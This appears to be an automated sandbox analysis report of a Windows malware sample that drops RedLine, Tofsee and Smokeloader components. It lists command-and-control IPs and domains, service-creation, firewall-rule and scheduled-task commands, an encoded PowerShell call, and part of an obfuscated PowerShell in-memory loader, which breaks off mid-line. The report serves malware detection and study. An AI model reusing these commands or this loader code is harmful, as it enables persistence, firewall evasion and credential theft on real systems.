Analysis
-
max time kernel
65s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
22-09-2022 19:58
Static task
static1
Behavioral task
behavioral1
Sample
c8883f54905378290695087786808d2b9badf90356eba811bb3ed69ac03feb9f.exe
Resource
win10v2004-20220901-en
General
-
Target
c8883f54905378290695087786808d2b9badf90356eba811bb3ed69ac03feb9f.exe
-
Size
280KB
-
MD5
1d512d993cd27ebccc0857bcf56d71a8
-
SHA1
8aa50624fbc619c694aa533ef69533d8d92801e5
-
SHA256
c8883f54905378290695087786808d2b9badf90356eba811bb3ed69ac03feb9f
-
SHA512
33a0eca1c0b61e5512add899219ef1aac2e06db633969a411a3b39acadea886e9f28f643a888b1c7cfe393c47c51782fb67a5ac2613d38f2d22c94d83d4e1e4c
-
SSDEEP
6144:czixk8is3Lf8b+0eWqls1sR6VIxjPymk0LQigavwVfrD:czi1Rob+0euqkuPy45c
Malware Config
Extracted
redline
dantesoprano
5.252.118.34:37991
-
auth_value
b5af0cad45273cbce8023bfa93cf0768
Extracted
redline
LogsDiller Cloud (Sup: @mr_golds)
77.73.134.27:8163
-
auth_value
56c6f7b9024c076f0a96931453da7e56
Extracted
tofsee
svartalfheim.top
jotunheim.name
Signatures
-
Detects Smokeloader packer 1 IoCs
Processes:
resource yara_rule behavioral1/memory/4828-133-0x00000000005E0000-0x00000000005E9000-memory.dmp family_smokeloader -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\50F2.exe family_redline C:\Users\Admin\AppData\Local\Temp\50F2.exe family_redline behavioral1/memory/53496-171-0x0000000000CC0000-0x0000000000D28000-memory.dmp family_redline behavioral1/memory/95676-190-0x0000000000400000-0x0000000000428000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
setup.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ setup.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 8 IoCs
Processes:
4650.exe4910.exe4B34.exe50F2.exe5373.exezqglpzon.exesyst.exesetup.exepid process 2220 4650.exe 6832 4910.exe 17552 4B34.exe 53496 50F2.exe 60952 5373.exe 4604 zqglpzon.exe 4788 syst.exe 2372 setup.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
svchost.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\bxghhwvz\ImagePath = "C:\\Windows\\SysWOW64\\bxghhwvz\\zqglpzon.exe" svchost.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
setup.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion setup.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
5373.exe4910.exe50F2.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 5373.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 4910.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 50F2.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\setup.exe themida C:\Users\Admin\AppData\Local\Temp\setup.exe themida behavioral1/memory/2372-265-0x00007FF639A70000-0x00007FF63A32B000-memory.dmp themida behavioral1/memory/2372-267-0x00007FF639A70000-0x00007FF63A32B000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
setup.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA setup.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
setup.exepid process 2372 setup.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
4650.exezqglpzon.exedescription pid process target process PID 2220 set thread context of 95676 2220 4650.exe AppLaunch.exe PID 4604 set thread context of 1864 4604 zqglpzon.exe svchost.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exepid process 95704 sc.exe 95732 sc.exe 2860 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
c8883f54905378290695087786808d2b9badf90356eba811bb3ed69ac03feb9f.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c8883f54905378290695087786808d2b9badf90356eba811bb3ed69ac03feb9f.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c8883f54905378290695087786808d2b9badf90356eba811bb3ed69ac03feb9f.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c8883f54905378290695087786808d2b9badf90356eba811bb3ed69ac03feb9f.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 4 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
c8883f54905378290695087786808d2b9badf90356eba811bb3ed69ac03feb9f.exepid process 4828 c8883f54905378290695087786808d2b9badf90356eba811bb3ed69ac03feb9f.exe 4828 c8883f54905378290695087786808d2b9badf90356eba811bb3ed69ac03feb9f.exe 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2948 -
Suspicious behavior: MapViewOfSection 29 IoCs
Processes:
c8883f54905378290695087786808d2b9badf90356eba811bb3ed69ac03feb9f.exeexplorer.exepid process 4828 c8883f54905378290695087786808d2b9badf90356eba811bb3ed69ac03feb9f.exe 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 2948 75988 explorer.exe 75988 explorer.exe 75988 explorer.exe 75988 explorer.exe 75988 explorer.exe 75988 explorer.exe 75988 explorer.exe 75988 explorer.exe 75988 explorer.exe 75988 explorer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
Processes:
msedge.exepid process 3604 msedge.exe 3604 msedge.exe -
Suspicious use of AdjustPrivilegeToken 57 IoCs
Processes:
powershell.exe50F2.exeAppLaunch.exedescription pid process Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeDebugPrivilege 95860 powershell.exe Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeDebugPrivilege 53496 50F2.exe Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeDebugPrivilege 95676 AppLaunch.exe Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 Token: SeShutdownPrivilege 2948 Token: SeCreatePagefilePrivilege 2948 -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
msedge.exepid process 3604 msedge.exe 2948 2948 3604 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4650.exe5373.exe4910.exedescription pid process target process PID 2948 wrote to memory of 2220 2948 4650.exe PID 2948 wrote to memory of 2220 2948 4650.exe PID 2948 wrote to memory of 2220 2948 4650.exe PID 2948 wrote to memory of 6832 2948 4910.exe PID 2948 wrote to memory of 6832 2948 4910.exe PID 2948 wrote to memory of 6832 2948 4910.exe PID 2948 wrote to memory of 17552 2948 4B34.exe PID 2948 wrote to memory of 17552 2948 4B34.exe PID 2948 wrote to memory of 17552 2948 4B34.exe PID 2948 wrote to memory of 53496 2948 50F2.exe PID 2948 wrote to memory of 53496 2948 50F2.exe PID 2948 wrote to memory of 53496 2948 50F2.exe PID 2948 wrote to memory of 60952 2948 5373.exe PID 2948 wrote to memory of 60952 2948 5373.exe PID 2948 wrote to memory of 60952 2948 5373.exe PID 2948 wrote to memory of 63496 2948 explorer.exe PID 2948 wrote to memory of 63496 2948 explorer.exe PID 2948 wrote to memory of 63496 2948 explorer.exe PID 2948 wrote to memory of 63496 2948 explorer.exe PID 2948 wrote to memory of 75988 2948 explorer.exe PID 2948 wrote to memory of 75988 2948 explorer.exe PID 2948 wrote to memory of 75988 2948 explorer.exe PID 2948 wrote to memory of 85732 2948 explorer.exe PID 2948 wrote to memory of 85732 2948 explorer.exe PID 2948 wrote to memory of 85732 2948 explorer.exe PID 2948 wrote to memory of 85732 2948 explorer.exe PID 2220 wrote to memory of 95676 2220 4650.exe AppLaunch.exe PID 2220 wrote to memory of 95676 2220 4650.exe AppLaunch.exe PID 2220 wrote to memory of 95676 2220 4650.exe AppLaunch.exe PID 2948 wrote to memory of 95684 2948 explorer.exe PID 2948 wrote to memory of 95684 2948 explorer.exe PID 2948 wrote to memory of 95684 2948 explorer.exe PID 2220 wrote to memory of 95676 2220 4650.exe AppLaunch.exe PID 2220 wrote to memory of 95676 2220 4650.exe AppLaunch.exe PID 2948 wrote to memory of 95756 2948 explorer.exe PID 2948 wrote to memory of 95756 2948 explorer.exe PID 2948 wrote to memory of 95756 2948 explorer.exe PID 2948 wrote to memory of 95756 2948 explorer.exe PID 2948 wrote to memory of 95800 2948 explorer.exe PID 2948 wrote to memory of 95800 2948 explorer.exe PID 2948 wrote to memory of 95800 2948 explorer.exe PID 2948 wrote to memory of 95800 2948 explorer.exe PID 60952 wrote to memory of 95860 60952 5373.exe powershell.exe PID 60952 wrote to memory of 95860 60952 5373.exe powershell.exe PID 60952 wrote to memory of 95860 60952 5373.exe powershell.exe PID 2948 wrote to memory of 95932 2948 explorer.exe PID 2948 wrote to memory of 95932 2948 explorer.exe PID 2948 wrote to memory of 95932 2948 explorer.exe PID 2948 wrote to memory of 95932 2948 explorer.exe PID 2948 wrote to memory of 96012 2948 explorer.exe PID 2948 wrote to memory of 96012 2948 explorer.exe PID 2948 wrote to memory of 96012 2948 explorer.exe PID 6832 wrote to memory of 96092 6832 4910.exe cmd.exe PID 6832 wrote to memory of 96092 6832 4910.exe cmd.exe PID 6832 wrote to memory of 96092 6832 4910.exe cmd.exe PID 2948 wrote to memory of 96156 2948 explorer.exe PID 2948 wrote to memory of 96156 2948 explorer.exe PID 2948 wrote to memory of 96156 2948 explorer.exe PID 2948 wrote to memory of 96156 2948 explorer.exe PID 6832 wrote to memory of 96176 6832 4910.exe cmd.exe PID 6832 wrote to memory of 96176 6832 4910.exe cmd.exe PID 6832 wrote to memory of 96176 6832 4910.exe cmd.exe PID 6832 wrote to memory of 95704 6832 4910.exe sc.exe PID 6832 wrote to memory of 95704 6832 4910.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\c8883f54905378290695087786808d2b9badf90356eba811bb3ed69ac03feb9f.exe"C:\Users\Admin\AppData\Local\Temp\c8883f54905378290695087786808d2b9badf90356eba811bb3ed69ac03feb9f.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\4650.exeC:\Users\Admin\AppData\Local\Temp\4650.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bestrealprizes.life/?u=lq1pd08&o=hdck0gl3⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffde5046f8,0x7fffde504708,0x7fffde5047184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,2365226601529953806,14064733012680150496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,2365226601529953806,14064733012680150496,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:34⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,2365226601529953806,14064733012680150496,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,2365226601529953806,14064733012680150496,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,2365226601529953806,14064733012680150496,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2172,2365226601529953806,14064733012680150496,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4568 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,2365226601529953806,14064733012680150496,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,2365226601529953806,14064733012680150496,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,2365226601529953806,14064733012680150496,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3856 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2172,2365226601529953806,14064733012680150496,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3640 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,2365226601529953806,14064733012680150496,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,2365226601529953806,14064733012680150496,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,2365226601529953806,14064733012680150496,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6332 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x228,0x22c,0x230,0x204,0x234,0x7ff7b45b5460,0x7ff7b45b5470,0x7ff7b45b54805⤵
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\4910.exeC:\Users\Admin\AppData\Local\Temp\4910.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bxghhwvz\2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\zqglpzon.exe" C:\Windows\SysWOW64\bxghhwvz\2⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create bxghhwvz binPath= "C:\Windows\SysWOW64\bxghhwvz\zqglpzon.exe /d\"C:\Users\Admin\AppData\Local\Temp\4910.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description bxghhwvz "wifi internet conection"2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start bxghhwvz2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
- Modifies Windows Firewall
-
C:\Users\Admin\AppData\Local\Temp\4B34.exeC:\Users\Admin\AppData\Local\Temp\4B34.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\50F2.exeC:\Users\Admin\AppData\Local\Temp\50F2.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\syst.exe"C:\Users\Admin\AppData\Local\Temp\syst.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /TN "$77host" /XML "C:\Windows\SysWOW64\$77Host.xml" /f3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /TN "$77host" /XML "C:\Windows\SysWOW64\$77Host.xml" /f4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\$77Install.exe"C:\Windows\SysWOW64\$77Install.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\5373.exeC:\Users\Admin\AppData\Local\Temp\5373.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgA4AA==2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\bxghhwvz\zqglpzon.exeC:\Windows\SysWOW64\bxghhwvz\zqglpzon.exe /d"C:\Users\Admin\AppData\Local\Temp\4910.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Sets service image path in registry
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Roaming\dsgjfrcC:\Users\Admin\AppData\Roaming\dsgjfrc1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:VVRmnHfHSTTa{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$LluJlfwLQXTGSz,[Parameter(Position=1)][Type]$PRuRwDRoOp)$vwFRqDmexRh=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$vwFRqDmexRh.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$LluJlfwLQXTGSz).SetImplementationFlags('Runtime,Managed');$vwFRqDmexRh.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$PRuRwDRoOp,$LluJlfwLQXTGSz).SetImplementationFlags('Runtime,Managed');Write-Output $vwFRqDmexRh.CreateType();}$pCxIrdcIpSNVj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$EbynVzihRwyXbL=$pCxIrdcIpSNVj.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$NgYUkqLqugDZbVfgvAN=VVRmnHfHSTTa @([String])([IntPtr]);$PydNWbUxeFBCUYMPeETwJY=VVRmnHfHSTTa 